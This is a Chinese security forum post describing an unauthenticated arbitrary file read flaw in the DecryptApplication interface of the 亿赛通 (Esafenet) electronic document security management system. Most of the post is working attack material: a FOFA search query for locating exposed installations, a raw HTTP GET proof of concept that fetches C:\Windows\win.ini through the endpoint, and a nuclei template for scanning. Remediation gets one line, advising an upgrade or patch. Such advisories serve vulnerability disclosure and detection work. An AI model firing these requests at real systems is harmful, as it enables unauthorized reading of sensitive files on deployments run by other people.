亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞

我是大白   ·   发表于 2024-03-14 21:12:52   ·   漏洞文章

亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞

漏洞描述

亿赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息,导致系统处于极不安全的状态。

产品界面

fofa语法

app="亿赛通-电子文档安全管理系统"

POC

  1. GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=test1111 HTTP/1.1
  2. Host:

nuclei验证

  1. id: yisaitong-DecryptApplication-fileread
  2. info:
  3. name: 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞
  4. author: nobody
  5. severity: high
  6. description: |
  7. 亿赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息
  8. impact: |
  9. 未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息
  10. remediation: |
  11. 升级版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: app="亿赛通-电子文档安全管理系统"
  16. tags: fileread
  17. requests:
  18. - raw:
  19. - |
  20. GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=testtest HTTP/1.1
  21. Host: {{Hostname}}
  22. matchers:
  23. - type: dsl
  24. dsl:
  25. - status_code == 200 && contains_all(body,"[files]")

修复建议

  • 建议升级到最新版本或打补丁

打赏我,让我更有动力~

0 Reply   |  Until 1个月前 | 154 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.